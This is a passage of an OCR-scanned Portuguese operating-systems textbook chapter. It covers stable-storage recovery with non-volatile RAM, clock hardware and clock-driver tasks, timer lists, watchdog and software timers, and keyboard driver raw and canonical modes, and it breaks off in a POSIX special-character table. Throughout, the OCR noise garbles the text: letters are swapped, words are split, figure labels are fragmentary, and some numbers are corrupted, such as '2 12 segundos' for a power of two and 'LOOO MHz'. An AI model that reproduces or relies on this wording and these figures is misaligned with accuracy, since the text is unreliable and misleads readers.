bem-sucedida. 


Ha varias otimizaęoes e melhorias para esse esquema. 
Para comeęar, após uma fallia e possfvel fazer uma compa- 
raęao de todos os blocos para pat, mas isso implica um aha 
custo. Um grandę awmęo e manter o conlrolc dc qual bloco 
cstava sendo escriio durante uma escrita estavel, de modo 
que somente um bloco deve ser verificado durante a recu- 
pcraęao. Alguns compuiadorcs tem unia peąucna quan- 
tklade de RAM nao vołatil, que e uma memória CMOS 
especial mantida por uma bateria de Iftio. Essas baterias ra 
sistem por a nos — possiydmente durante toda a vida util 
do computador. Ao com rań o da memória principal, a RAM 
nao volatil nao e perdida após uma falha. Norma 1 menie, 
a hora do dia e mantida (e inerementada por um circuito 
especial) e, por isso, os compuiadorcs ainda sabem a hora 
atual mesmo após terem sido desligados. 

Suponha quc alguns poucos bytes dc RAM nao yolatil 
estejam disponiveis para uso pelo sistema operacional. A 
escrita e$tavd pode colocar o numero do bloco que sera 
atualizado na RAM nao volatil anlcs dc i nicią r a escrita* 
Após a condusao bem-sucedida da escrita estavd, o nume- 
ro do bloco da RAM nao volatiI e sobrescrito corn um nu¬ 
mero dc bloco invalido (por exemplo, -1). Sob essas con- 
diędes, após uma falha o programa dc rccuperaęao pode 
yerificar a RAM nao volati] para averiguar se uma escrita 
estave1 estava em andamemo durante a falha e, se assim 
for, descobrir qual bloco estava sendo eseisto. As duas có¬ 
pias do bloco podem entao ser yerilicadas ąuanto a exati- 
dao e a consistencia. 

Sc a RAM nao vo!aiil nao se enconira dispontvel, ela 
pode ser simulada da seguinte maneira: no infcio da escrita 
estayel, um bloco prcdeierminado do disco na unidade I 
e sobrescrito com o numero do bloco que sofrera a escrita 
estavel. Esse bloco ć entao lido novameme para verifica- 
ęao, Após obte-lo corretamente, o bloco correspondente na 
unidade 2 c escriio c verificado, Quando a escrita cstavcl e 
concluida do modo certo, ambos os blocos sao sobrcscritos 
com um numero de bloco itwalidoe venficados* Novamen¬ 
ie, entao, após uma falha e facil determinarse havia ou nao 
uma escrita estavel cm andamento durante a falha. Qb- 
yiamente, essa tecnica reąuer oito operaęoes adicionais de 
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disco para escrever urn bloco estavel e, por isso, ela deveria 
ser usada o me nor numer o de vezes possfvel. 

Ha a i nda urn ultimo ponto importantc a ab orda r\ Prc- 
sumimosque podeocorrer semenie uma falba espontanea 
de um bloco bom para um bloco defeiluosó por par de blo- 
cos por dia. Se muitos dias forem decorridos, o ouiro bloco 
do par tambem pociera se tornar defeituoso. Portanto, uma 
vezao dia deve ser feita inna varredura completa de ambos 
os discos, a fim de reparar quaisquer danos. Desse modo, 
a cada manha ambos os discos sao sempre Ldenticos, Am- 
da que ambos os blocos cm um par apresentem defeitos 
dentro dc um pcriodo dc poucos dias, todos os erros sao 
repa rad os corretamentc. 


5.5 


Relógios 


Relógios — tambem chamados dc temporizadores 
{timers) — sao essendais para o funcionamento de qual- 
quer sistema niultiprogramado por uma variedade de ra- 
zóes. Entre outras coisas, eles mantem a hora do dia e evi- 
tam que um processo monopolize a CPU. O software do 
relógio pode toinar a forma de um driver de dispositivo, 
muito embora um relógio nao seja nem um dispositivo de 
bloco, como um disco, nem um disposiiivo de caractere, 
como um moiise. Nosso esdarecmiento sobre os relógios 
seguira o mesmo pa dra o das seędes anteriores: prlmdro 
iremos abordar o assunto com relaęao ao hardware c, en¬ 
tao, passar para o software. 


5.5.11 Hardware do relógio 

Dois tipos de relógios sao usualmeme utilizados nos 
eomputadores e ambos sao bem diferemes dos relógios co- 
mum de pulso ou de parcele* Os relógios mais simples sao 
liga dos a uma linha de voltagem de 110 ou 220 volts e 
ca u sam uma interrupęao cm cada cido de Yoltagem, a uma 
freąuenda dc 50 ou 60 hertz. Esscs relógios ja forarn os 
mais empregados, mas sao raros boje cm dia. 

O outro lipo dc relógio c constriudo a partir dc irćs 
componentes: um osdlador de cristal, um comador e um 
registrador de apoio, como mostra a Figura 5.29. Ouando 
um fragmento dc cristal dc ąuartzo e cortado corretamcntc 
e montado sob tensao, clc pode ser usado para gerar um si- 


nal periódico de altfssima precisao, geralmente na faixa de 
varias centenas de megahertz, dependendo do cristal esco- 
Ihido. Usando a eletrónica, esse sinal basico pode ser mul- 
tiplicado por um pcąueno inteiro para obter freąuendas de 
atc LOOO MHz ou ainda mais. Pclo menos um desses cir- 
cuitos pode ser cncontrado cm qualquer computador, for- 
ncccndo um sinal dc sincronizaęao para os varios circuitos 
do computador. Esse sinal c colocado cm um comador para 
fazc-lo comar regressivameme ale zero. Quando o coma¬ 
dor atinge o zero, ele gera uma imerrupęao na CPU. 

Os relógios prcgramaveis geralmente apresemam va- 
rios modos de operaęao. No modo disparo unico (om- 
shot modę), ao ser inicializado, o relógio copia o valor do 
registrador dc apoio para dentro do comador c, entao, 
decrcmenta o comador a cada pulso do cristal. Ouando o 
comador chega a zero, ele causa uma imerrupęao e para 
a te que seja explicitamenie reinicializado pelo software. 
No modo onda ąuadrada, após aiingir o zero e causar 
a interrupęao, o registrador de apoio e aulomaticamente 
copiado para dentro do comador e o processo todo e repe- 
tido interminavelmente. Essas interrupęóeś periódicas sao 
chamadas dc tiques do relógio. 

A vamagem do relógio programavd e que sua frequen- 
cia de interrupęao pode ser comrolada pelo software. Se 
um cristal de 500 MHz e ttsado, entao o comador e pul- 
sado a cada 2 ns. Com registradores de 32 bits (sem sinal) 
as interrupęóeś padem ser programadas para ocorrer em 
intervaios dc 2 ns a 8,6 s. Os chips dos relógios programa- 
veis comem, em geral, dols ou mais relógios programaveis 
independentes c apresentam ainda miiitas outras opęocs, 
como contarcom incrcmcnto cm vezde decrcmcnto, desa- 
bilitar interrupęóeś etc. 

Para evilar a perda do horario atual quando a energia 
do compuiador e dos Liga da, a maioria dos computadores 
tem um relógio de seguranęa mantido por uma bateria, im- 
plementado com o tipo de circuito de baixo consumo usado 
nos relógios digitais de pulso. O relógio a bateria pode ser 
lido na inidalizaęao do sistema. Sc o retógio de seguranęa 
nao es ta presente, o software pode p ergu n tar para o usua- 
rio a data e a hora amalizadas. Existe lambem urna forma 
-padrao para um sistema de rede obter o horario atual de 
um compuiador remolo. Em ąualąuer caso, a hora e entao 
traduzida para o niimero de tiques de relógio desde as 12 
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I Figura 5.29 Um relógio programśveb 
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liorasde i a de Janeiro de 1970, de acordo com a Coordenada 
Universal do Tempo ( Uniwrsa! Coordinated Time — UTC, an- 
ics conhccida como mcio-dia dc Greenwich), como o UNIX 
faz, ou e baseada em o o tras referencias. A origem do tempo 
para o Windows e l u de Janeiro de 1930. A cada tique dc 
relógio, o tempo real e incrementado de L Em gorał sao 
fornecidos program as utilitarios de ajuste manuał do rdó- 
gio do sistema, e o relógio de seguranęa smcroniza ambos. 

5.5.21 Software do relógio 

Tudo o que o hardware do relógio faz e gerar interrup¬ 
ęoes cm intmalos conhecidos. Tudo o mais que envolva 
tempo deve ser realizado pelo software, o driver do relógio. 
As obrigaęoes exatas do driver do relógio variam de acordo 
com o sistema operacional, mas em geral inckiem a maio- 
ria das seguintes aędes: 

1. Manier a hora do dia, 

2. Eviiar que algum processo exetute du ramę urn 
tempo inaior do que o permitklo. 

3. Contabilizar o uso da CPU. 

4. Tratar a cha mada de sistema alarm lei ta pelos proces- 
sos do usuario. 

5. Fornecer temporizadores watch-dog para partes do 
próprio sistema. 

6 . Gerar perlis de execuęao, realizar monitora men los 
e colctar estaitsiicas. 

A primeira funęao do relógio — a manutenęao da hora 
do dia (lambern chamada de tempo real) — nao e muito 
complexa. Ela reąuer apenas o incremento do contador em 
cada tique do relógio, eon formę mencionado ameriormen- 
te + O u nico cukiado a ser tornado ć com rdaęao ao nu mero 
de bits no comador. Com urna freąuenria de relógio de 60 Hz, 
urn contador de 32 bits estouraria sua capacidade em ape¬ 
nas dois a nos. Fica daro que o sistema nao pode armazenar 
o tempo real como o nttmero de tiąues desde l fl dc Janeiro 
de 1970 em 32 bits. 

Ha tres meios para resolver esse problema. A primeira 
maneira e usar um contador de 64 bits, embora isso faęa 
com que a manmenęao do contador seja nniito dispendio- 
sa, ja quc cla devc ser feita muitas vezes por segundo. O 
segundo modo e inanter a hora do dia cm segundos em 
vez de tiąues de relógio, usando um contador atmliar para 


contaros tiques ate que um segundo completo tenha sido 
acumulado. Como 2 12 segundos excedem 136 anos, esse 
metodo funcionara bem ate o seculo XXII, 

A terceira abordagem implica contar os tiąues, mas a 
partit do tempo de imcializaęao do sistema cm vez de um 
tempo externo prefixado. Quando o relógio de seguranęa e 
lido ou o usuario digita o tempo real, o horario dc iniciali- 
zaęao do sistema e calculado a partir do valor atual da hora 
do dia, sendo armazenado na memória cm qualquer for- 
mato conveniente. Posteriormente, quando a hora do dia e 
solidiada, o tempo armazenado na memória e adicionado 
ao comador para obter a hora atual do dia, Todas as tres 
abordagens sao mostradas na Figura 5.30. 

A segunda funęao do relógio e cvitar quc os proecssos 
executem por inuito tempo. Sempre que um processo e 
inicializado, o escalonador inicializa o comador com o va- 
lor do ąuantum do processo cni tiąues de relógio. Em cada 
interrupęao do relógio, o driver do relógio decrementa o 
contador do ąuantum de I. Quando o comador atinge o 
zero, o driver do relógio chama o escalonador para sdecio- 
nar outro processo. 

A terceira funęao do relógio e contabilizar o uso da 
CPU. A maneira mais corrcta de fazer isso e inidalizar um 
segundo temp ori zador, diferentc do relógio Principal do 
sistema, sempre que um processo e inidalizado. Ouaudo 
o referido processo c interrompido, o temporizador pode 
ser lido, pennilindo saberpor quanto tempo ele esteve em 
execuęao. Para isso, o segundo tempori zador deve ser salvo 
na ocorrencia de urna interrupęao c restaurado posicrior- 
mente. 

Uma maneira menos precisa mas muito mais simples 
para contabilizar o uso da CPU e manier um ponteiro para 
a emrada da tabela de processos reiativa ao processo em 
cxecuęao em urna variavel global A cada tiąue de relógio, 
um campo na entrada do processo atual sofre um inere- 
mento. Dessc modo, cada tiquc de relógio e contabiliza- 
do para o processo em ocecuęao no momento do iique. 
Um problema nao muito serio com essa estra legia e que r 
se muitas interrupęoes ocorrerem durante a execuęao de 
um processo, ainda assim ele sera contabilizado com um 
tiąue completo, embora nao tenha trabaIhado muito. A 
contabilidade correta para a CPU durante as interrupęoes e 
bastame dispendiosa c raramente e feita. 


64 bits 


Hora do dia em tiques 


(a) 


32 bits 


32 bits 



sistema em segundos 


(b) 


(c) 


] Figura 5.30 Tres marieiras para manfer a hora do dia. 
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Em muitos sistemas, um processo pode solidtar qne o 
sistema operadonal 3he de um aviso após um certo imerva- 
lo. 0 aviso consiste, em geral, em um sinal, urna interrup¬ 
ęao, uma mensagem ou algo sini i lar. Urna aplicaęao que re- 
qncr o iiso dcsscs avisos ć a comunicaęao cm rcdc, na qual 
um pacotc nao conirmado dcntro dc urn certo intcrvalo dc 
tempo dcvc ser retransmitido* Uma oulra aplicaęao ć o en- 
sino auxiUado poi computador, em quc um estudante que 
nao forneęa a resposta dcntro de um certo tempo recebe a 
resposta do co mp lii a don 

Sc o drivcr do rdógio gerenria relógios sufidentes, ele 
pode ajustar um rdógio separado para cada requisięao. Se 
nao e esse o caso, dc dcvc simular varios relógios virtuais 
com um unico rdógio Esico, Uma mancira de fazer isso ć 
ter uma tabela na qual sao manlidos os tempos dos sinais 
para todas os temporizadores pendentem bem como uma 
variavel que fomece o tempo do sinal seguinie. Sempre que 
a hora do dia e atualizada, o driver verifica se o tempo do 
sinal mais próximo ja decorreu. Em caso afimiativo, a ta¬ 
bela e pesquisada para encontrar o próximo sinal a ocorrer. 

Sc muitos sinais sao esperados, e mais efidente simular 
varios reiógios por meio do encadeamento de todas as rc- 
quisięóes dos relógios pendentes juntas, ordenadas no tem¬ 
po, em uma lista encadeada, como mostra a Figura 5.31. 
Cada entrada da lista dizquantos tiques de rdógio seguin- 
tes ao anteno.r devem ser esperados antes de causar um 
sinal. Nesse exemplo, os sinais sao pendentes para 4203, 
4207, 4213, 4215 e 4216. 

Na Figura 5.31, a interrupęao seguinte ocorre em tres 
tiques. Em cada tique r o H Próximo sinal' sofre um decre- 
mento. Quando ele a lingę o valor zero, o sinal correspon- 
dente a o primeiro item da lista e emittdo e o referido item 
e removido da lista. O Tróximo sinal' e, entao, ajustado 
para o valor na entrada vigente na cabeęa da lista, que no 
exemplo dado e 4. 

Notę que, durańte mna interrupęao de rdógio, o dii- 
ver do relógio precisa realizar varias tarefas: inerementar 
o tempo real, decrememar o quamum e comparar com 0, 
contabilizar o uso da CPU e decrememar o contador do 
alarme. No entanto, cada uma dessas operaęoes foi cuida- 
dosamente organizada para ser muito rapida, pois das se 
repet em Yarias vezes por segundo, 

Partes do sistema operadonal latnbem precisam ajus¬ 
tar temporizadores. Estes, por su a vez, sao chamados de 
temporizadores watch-dog. Por exemplo, os discos fle¬ 


tem po atual Próximo sinal 



I Figura 5.31 Simulaęao de multiptos temporizadores com um 
unico relógio. 


xfveis naosofrem rotaęao quando nao estao em uso, para 
evitar desgaste na midi a e no cabeęote do disco. Quando 
os dados de um disco flexivel sao necessarios, o motor 
deve primeiro ser inicializado. Somente após o disco fle- 
xiVel cslar cm rotaęao na vdocidade idea! c que as opera¬ 
ęoes dc E/S podcm ser inicializadas, Quando um processo 
tenta ler dc um disco flexfvcl ocioso, o driver do disco 
flcxfvcl inicializa o motor e, entao, aj u sta um temporiza- 
dor watch-dog para que gere uma interrupęao após um 
intervalo de tempo suficiememente longo (pois nao existe 
nenhuma imermpęao do disco flexfvel que informe se ele 
esta nessa situaęao). 

O mccanismo usado pclo drivcr do rdógio para tratar 
temporizadores watch-doge o mesmo empregado para tra¬ 
tar os sinais do usuario, A unica diferenęa e que, ąuando 
um temporizador se esgota, o driver do rdógio, em vez de 
causar um sinal, chama um proeedimento fornecido pdo 
chamador. O proeedimento e parte do código do chamador. 
O proeedimento cha mado pode fazer o que for necessa- 
rio, ate mesmo causar uma interrupęao, embora dcntro do 
nudeo as interrupęóes muitas vezes sejam inconvenientes 
e nao haja sinais. Essa e a razao dc ser do mccanismo dc 
watch-dog. Ź importantc not ar quc esse mccanismo fundo- 
na somente ąuando o drivcr do rdógio c o proeedimento 
a ser chamado cslao no mesmo cspaęo dc endcrcęamcnto, 

A ultima ąuestao de nossa lista e o perfil de execuęao. 
Alguns sistemas operacionais fornecem um mccanismo 
pclo qual um programa do usuario pode obter do sistema 
um histograma dc seu contador dc programa, dc modo quc 
possa vcr ondc seu tempo esta sendo gasto. Ouando cxistc 
a possibilidade de cxtrair o perfiI dc cxccuęao, a cada tiąuc 
de rdógio o driver vcrifica sc o perfil dc execuęao do pro¬ 
cesso atual esta sendo oblido e, cm caso afirmativo, calcu la 
o internie (uma faixa de endcreęos) correspondeme ao 
contador de programa atual Ele, en tao, inerementa esse 
imervalo de 1. Esse mecanismo tambem pode ser usado 
para extrair o perlił de execuęao do próprio sistema. 

5.5,31 Temporizadores por software 

A maioiia dos compmadores tem um segundo rdógio 
programavcl quc pode ser ajustado para causar interrup¬ 
ęóes a qualqucr iaxa que um programa precisar. Esse reló¬ 
gio e outro Lcmporizador aletn do principal, cujas funęoes 
forani descritas anteriormente. Quando a frcąuencia de 
interrupęao e baixa, nao ha por que nao usar um segundo 
Lcmporizador para os propósitos da aplicaęao. O problcma 
surge ąuando a frcąućncia do lcmporizador da aplicaęao 
6 muito alta. A ścgihr, dcscrevercmos brevemnitc um es- 
ąuenia de tcmporizaęao baseado em software que funciona 
bem em muitas circunstancias, mesmo cm alias frcquen- 
cias. A kicia foi da da por Arone Druschd (1999). Para mais 
detalhes, por fayor kiam o artigo deles. 

Emgcral, cxistcm duas manciras dc gcrcnciarE/S: inlcr- 
rupęoes c poi ling. As interrupęóes tem baixas latcncias, isto 
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e, eias ocorrem imediatamente após o evemo propriamente 
dito, com poucoou nenh u ui atraso. Por outrolado, nas CPUs 
moderna s, as interrupęoes ca u sam urna sobrecarga substan- 
dal em virtude da necessidade dos chavcamcnros dc eon* 
tcxtos c da inflnćnda dclas no pipeline, na TLB e na cache. 

Urna a! temat iva as interrupęóes e permitir que a pró- 
pria aplicaęao verifique por meio de polling, em certos in- 
tervalos de tempo, a ocorrencia do evento esperado. Agindo 
assim, as interrupęóes sao evitadas, mas em compensaęao 
talvez ocorra um atraso substandal de tempo, pois o even- 
to pode ocorrer imediataincnte após urna verilicaęao que 
acabou dc ser realizada, fazendo com que a aplicaęao tenha 
de esperar mais um intervalo de polling quasc complcto 
para pereeber a ocorrencia do cvcnto. Na media, o atraso e 
de metade do intervalo de polling* 

Para algumas aplicaęóes, nem a sobrecarga das inter¬ 
rupęoes nem a latcnda de polling sao aceitaveis, Conside- 
re, por exemplo, urna rede dc alto desempenho, como uma 
Ethernet Gigabit. Essa rede c capaz dc aceitar ou entregar 
um pa cole complcto a cada 12 ps. Para otimizar odesempe- 
nlio da saida, um pacotc devcria ser cnviado a cada 12 \is. 

Para atingir essa taxa, pode-se fazer com que a condu- 
sao da transmissao de um pacote cause uma interrupęao 
o u aj ust e o segundo temporizador para interroniper a cada 
12 ps. O problema e que o tempo dessa interrupęao foi 
medido em 4,45 ps em um Pentium II de 300 MHz (Aron 
e Druschel 1999). Essa sobrecarga e pouco melhor do que 
aquela obtida nos computadores da decada de 1970* Na 
maioria dos mini computadores, por exempIo, uma imen- 
rupęao ocupava quatro cięłoś de barrameruo: para empi- 
Ihar o contador de programa e a PS W e para carregar um 
novo contador de programa e PS W. Atualmeme, o trabalho 
com pipeline, MM U, TLB e cache adidona uma grandę so¬ 
brecarga. Esses efeiios provavelmente pioram com o tempo 
em vez de melhorar, anulando, assim, os beneficios das fre- 
ąuenrias dos relógios mais rapidos. 

Os temporizador es por software evitam interrup- 
ęóes. Em vez disso, sempre que o nudeo esta executando 
por alguma outra razao, imediaiamente antes de retor- 
nar para o modo usuario ele veritica o relógio de tempo 
real para averiguar se um temporizador por software expi- 
rotK Se o temporizador expirou, o evento escalonado (por 
exemplo, a transmissao de um pacote ou a vcrificaęao da 
chegada dc um pacote) e execmado, sem a nccessidade de 
chavcar para o modo nudeo, visto quc o sistema ja esta em 
execuęao* Após o trabalho ter sido ex ecu ta do, o tempori¬ 
zador por software e de novo reinicializado, Tudo o qne se 
tem a fazer e copiar o valor anta] do relógio para o tempo¬ 
rizador e adicionar-Ihe um inlervalo de tempo. 

Os temporizadores por software podem ou na o ser sus- 
tentado pela frequenda na qual as eotradas no nudeo sao 
fcitas por outras razócs* Entre essas tazoes estao; 

1 . Chamadas de sistema, 

2, Faltas na TLB, 


3. Faltas de pagtnas. 

4. Interrupęoes de E/S. 

5* CPU ociosa. 

Para saber a freąuencia de ocorrencia desses eventos r 
Aron e Druschel realizaram medięoes com varias cargas na 
CPU, induindo um semdor da Web totalmente carregado 
com um processo em segundo piano, executando a u di os 
em tempo real da Internet e recompilando o nudeo do 
UNIK. A frequencia media de entrada no nudeo variou de 
2 ps a 18 ps, com aproximadamenie metade dessas entradas 
sendo charnadas de sistema. Assim, para uma aproximaęao 
de primeira ordem, a exisrencia de um temporizador por 
software operando a cada 12 ps e possfvel, embora o tempo 
limite ocasionalmente expire. Para aplicaęóes que enviam 
pacoles ou verificam a chegada de pacotes, um atraso de 10 
ps de tempos em tempos e melhor do que ter interrupęoes 
consumindo are 35 por cento do tempo da CPU. 

Obviamente, exislirao periodos em que nao havera 
cha madas de sistema, faltas na TLB ou faltas de pagina, nos 
quais nenlrum temporizador por software sera reiniciallza- 
do. Para colocar um limite superior nesses imervalos, o se- 
gundo relógio de hardware pode ser ajustado para reinicia- 
iizar, digamos, a cada 1 ms. Se a aplicaęao pode viver com 
somente mil pacotes por segundo em intervalos ocasionais, 
en ta o a combi na ęa o dos temporizadores por software com 
um temporizador de hardware de baixa freąuencia pode 
ser melhor do que a E/S orientada somente a interrupęao 
ou controlada apenas por polling. 



Interfaces com o usuario: 
teclado, mouse, monitor 


Todo computador de propósito geral tem um teclado 
e um monitor de video (e, frequentemenie, um mouse) 
que pennitem que as pessoas interajam com ele. Embora o 
teclado e o monitor em um computador pessoal sejam lec- 
nicamemc dispositivos se para dos, des funcionam de ma- 
ncira muito próxima. Nos coniputadores de grandc porte, 
normalnienie cxistcm muitos usuarios rcmotos, cada um 
com um dispositivo contendo um teclado e um monitor 
conectados. Esses dispositivos tern sido histońcameme cha- 
rnados dc terminais. As pessoas normaImenie usarn essa 
terminologia, mesmo ąuando estao falando sobre teclados 
e monitores {cenameme pela falta de um termo melhor). 


_ŁŁ1 j Software de entrada 

As informaęoes do usuario vem, primciro, do teclado c 
do inou s c * E m u m compu ta d or pc ssoa 1, o te cla do eon t ć m u m 
processador embutido que costuma se comunicar com um 
chip controlador na płaca-mae atravćs de uma porta serial 
embora seja cada vez mais cotmun que os teclados sejam 
conectados a uma porta USB. Uma interrupęao e gerada 
sempre que uma tecla e pressionada e outra sempre que a 
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lecla e liberada. Em cada urna dessas imerrupęoes, o dri- 
ver do teclado extrai a informaęao sobre o que acontece 
na porta de E/S associada a o periferico. Todo o restante 
acontece no mvel do software e e bastante independente 
do hardware. 

A maior parte desta seęao pode ser maisbem compreen- 
dida ąuando pensamos na digitaęao de comandos em uma 
janela (imerface de comandos por linha). & assim que os 
pro gra ma dor es costumam trabalhar. Discutirenios as inter- 
faces grafkas a seguir. 

Software de teclado 

O n u mero na porta de E/S e o da teda — denominado 
código de varredura — e nao o código ASCII. Os tedados 
tein menos de 12S teclas c, portanlo, somenlc 7 bitssno ne- 
cessarios na repreśenlaęao do mi mero da teda. O oi1avo bit 
e de fi ni do como 0 ąuando a teda e pressionada e 1 ąuando 
da e liberada* Ca be a o driver controlar o esiado de cada 
teda (pressionada on liberada)* 

Quando a teda A e pressionada, o código da teda (30) 
e colocado no registrador de E/S. O driver e capa?, de de- 
termtnar se da e minuscula, maiuscula, CTRL A, ALT-A, 
CTRL-ALT-A mi algitma outra combinaęao. Visto que o dri- 
vcr pode dizer ąuais teclas foram pressionadas mas ainda 
nao liberadas (por cxemplo, usando SHIFT), ele lent Infor- 
maęao suficiente para fazer o trabalho. 

Por exempło, a seąuencia de teclas 

DEPRESS SHIFT, DEPRESS A, RELEASE A, RELEASE 

SHIFT 

indica um caractere A mauisculo, Contudo, a seąuencia 
de tedas 

DEPRESS SHIFT, DEPRESS A, RELEASE SHIFT, 

RELEASE A 

tambem indica um caractere A maiuscuio. Embora essa in- 
terface de teclado difkulte bastante a vtda do usuario do 
software, da e ex trema men te fiexfvel. Por exemplo, os 
programas do usuario podem estar interessados em saber 
se o digito que acabou de ser pressionado veio da fileira de 
tedas do topo do teclado ou do bloco numerico la terał Em 
prindpio, o drivcr pode fornecer essa iuformaęao. 

Ha dnas filosofias possfveis para o driver. Na primeira 
delas, o trabalho do driver consiste apenas em aceilar a en- 
trada e passa-la adiante inalterada. Um pr ogra ma que esta 
lendo de um terminal obtetn uma seąuencia grosseira de 
códigos ASCII. (Dar aos programas de usuarios os n ii me¬ 
ro s das tedas e muito pntnitivo e aha men te dependente 
de maąmna*} 

Essa filosofia e bastante adeąuada para as necessida- 
des de editores de termmais sofisticados como o emaes, que 
permite que o usuario associe uma aęao arbitraria para 
ąualąuer caractere ou seąuencia de caractercs. Contudo, 
ela jrnplica quc, se o usuario digilar dste em vez de dale e 
depois corrigir o erro digitando tres caractercs de retrocesso 


(backspace) mais ate f seguidos de um caractere de retorno 
de carro (carriage return — CR), o programa do usuario re- 
cebera todos os 11 caracteres digitados em código ASCII, 
como segue: 

dsfo^^^ateCR 

Nem todos os programas ąuerem esse mvel de detalhe. 
Muitas vezes eles simplesmenie desejam a entrada corri- 
gida e nao a seąuencia exata em ąue fol produztda. Essa 
observaęao leva a segunda filosofia: o driver trata toda a 
edlęao interna da linha c somente entrega as linhas corri- 
gidas para os programas do usuario. A primeira filosofia e 
baseada cm caractercs; a segunda, cm linhas. Otiginalmcn- 
te, des cram chamados dc modo bruto ou natural [raw 
modę) c modo preparado (cookedmodę). respectivamcnte, 
O padrao PO$iX usa a expressao menos pitoresca modo 
canónico para descrever o modo com base em linha. O 
modo nao canónico e equivalente ao modo bruto, embo- 
ra imiitos detalhes do comportamenio do terminal possam 
ser trocados. Os sistemas compatweis com o POSIX forne- 
cem varias funęoes de biblioteca que suponam a escolha do 
modo e a troca de muitos parametros. 

Se o teclado esiiver no modo canónico (p repa rado), os 
caracteres devemser armazenados ate ąue uma linha intei- 
ra seja montada, ja ąue o usuario pode decidir apagar parte 
dęła mais tarde, Mesmo ąuando o teclado esta no modo 
bruto {mw), o programa pode ainda nao ter solicitado ne- 
nhuina entrada e os caracteres podem estar armazenados 
para viabilizar a digitaęao antecipada. Pode ser usado um 
buffer dedicado ou divcrsos buffers podem ser alocados cm 
um poci. No primciro tipo, a digitaęao antecipada tem um 
limitc; no segundo, nao. Essa limitaęao fica clara ąuando o 
usuario esta digitando em unia janela de comandos (como 
no Windows) e inicializou um comando (como uma com- 
pilaęao) que ainda nao foi condufdo. Os próximos caracte¬ 
res a serem digitados precisam ser bufferizados, pois o shell 
nao esta preparado para le-los. Os projetistas de sistema 
qtte nao permitem que os usuarios digitem antecipada- 
mente deveriam ser seria me nte puiiidos ou, piór do ąue 
isso, deveriam ser obrigados a usar o próprio sistema. 

Embora o teclado e o monitor sejam dispositivos logi- 
cameme separados, muitos usuarios cresceram acostuma- 
dos a ver os caracteres por des digitados aparecerem na 
lela de vfdeo. Esse processo e chamado de eco. 

O eco c co mp lica do pclo fato dc que um programa 
pode estar escrevendo no monitor enąuanto o usuario di- 
gila (mais uma vez, pense na digitaęao em uma janela do 
shell). No inuiimo, o driver do teclado tem de calcu lar ornie 
colocar a nova entrada sem ąue ela seja sobrescrita pela 
safda do programa. 

O eco tambem se torna complicado ąuando, por exem- 
plo, mais de 80 caracteres sao mostrados em um monitor 
com lintias de 80 caracteres (ou algum outro nu mero), De- 
pendendo da aplicaęao, pode ser apropriado mostrar na li¬ 
nha seguinte os caractercs cxcedcnics, Alguns drivers sini- 
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pies menie trimcam as linhas em 80 caracteres descaftando 
todos os caracteres alem da oclogesima coluna. 

Outro próbie ma e o tratamento da tabulaęao, Em ge- 
ral, o drivcr e capa z dc caknlar on dc o cursor esia alual- 
mente localtzado, lcvando em consideraęao lamo a sarda 
dos programas ąuanto a safda do cco, e assim calcular tam- 
bem o nu mero correto de espaęos a ser ecoado. 

Chegamos agora ao problcma de equivalenda de 
disposit!vo. Logicamcnte, no finał de u ma linha dc texto 
cxistem um caractcrc CR, para movcr o cursor dc volta a 
coluna 1, c mn caractcrc dcalimcntaęaode linha {Hnefeed— 
LF), para avanęar o cursor para a linha seguinte. Obrigar os 
usuarios a digitar ambos os caracteres ao finał de cada linha 
nao seria urna boa kida. Fica a cargo do driver conveiler 
qualquer coisa que chega para o fonnato-padrao interno 
usado pelo sistema operacional. No UNIX, a lecla ENTER e 
convertida para urna alimentaęao de linha (LF — Hnefeed) 
para fins de armazenamento interno. No Windows, a mes- 
ma tecla e convertida para um ret orno do carro (CR — car- 
riage return), seguido dc urna alimentaęao de linha. 

Se o formato-padrao implica simplesmente armazenar 
um LF (convenęao doUMIX), entao os caracteres CRs (ge- 
rados pda tecla ENTER) dcvedam ser corwcriitios cm LFs. 
Se o lornia to-padrao preve a armazenagem de ambos (eon- 
eenęao do Windows), entao o driver deveria gerar um LE 
quando ele obtem um CR, e um CR, q u and o obtem um 
LF. Nao importa qual seja a convenęao interna; o terminal 
pode reguerer queambos, LFc CR, sejam ecoadospara quc 
a tela de video seja atualizada corretamente. Om sistemas 
multiusuario, como os de grandę porte, usuarios distintos 
pod cm fazer uso dc terminais diferemes — todos conecta- 
dos ao mesmo sistema — e cabe ao driver do tedado obter 
lodas as diferenies combinaęoes dc CR/LF eonvertidas para 
o padrao interno do sistema c organiza-las dc modo que 
todos os ecos sejam fdtos corretameme. 


Ao exeeutar em modo canonico, varios caracteres de 
entrada tern significados especiais, A Tabela 5.4 mostra lo- 
dos os caracteres especiais necessarios para o P0S1X. Os 
caraaeres padrao sao todos de comrole e nao deveriam 
conflitar com a entrada dc texto ou com os códigos usados 
pclos programas; mas todos, com cxccęao dos dois tikimos, 
podem set trocados dc acordo com o controle do próg rama. 

O caractere ERASE permite qtie o usuario apague o 
caractere que acabou de ser digitado. Ele e geralmente re- 
presentado pela tecla de retrocesso (CTRL-H). Ele nao e 
adidonado a fila dc caracteres; em vez disso, cle remove o 
caractcrc anterior da fila. Esse caractere deveria ser ccoado 
na tela como uma seąucncia de tres caraaeres; rctroccsso, 
espaęo c rctroccsso, dc modo quc rcmova o caractcrc an¬ 
terior da tda. Se o caractere anterior era unia tabulaęao, a 
remoęao desie dependc de como ele e processado ąuando 
digitado. Se ele e imediatameme expandido em espaęos, 
algmna iiiformaęao extra e necessaria para determinar o 
quanto retomar. Se o próprio caractere de tabulaęao e ar- 
mazenado na fila de entrada, ele pode ser removido e a 
linha toda e simplesmente mostrada novamente na tela. Na 
maioria dos sistemas, o uso dc retrocesso somente apaga 
caracteres da linha atual — de nao apaga um caractcrc CR 
e, assim, nunca retorna para a linha anterior. 

(Juando o usuario percebe um erro no infcio da linha 
que esia sendo digitada, ele prefere muitas vezes apagar a 
linha toda e comeęar novamente. O caractere K1LL apaga 
a linha inteira. A maioria dos sistemas faz a linha apagada 
desaparecer da tela, mas algims outros fazem com que da 
ecoe jmitamcnte com um CR e LF, pois alguns usuarios 
preferem continuar vcndo a linha antiga. Conscąucntc- 
mente, o modo dc ccoar o caractcrc KUL c uma qucstao dc 
gosto, Assim como ocorre com o caractere ER A SE, cm geral 
nao e possfrd retomar mais do que a linha atual {juando 
um bioto de caracteres e apagado, pode ou nao ser uma 


Caractere 

Nome POSIX 

Comentario 

CTRL-H 

ERASE 

Apagar um caractere a esquerda 

CTRL-U 

KILL 

Apagar toda a linha em edicao 

CTRL-V 

LNEXT 

Interpretar li terał mente o próximo caractere 

CTRL-S 

STOP 

Parar a salda 

CTRL-Q 

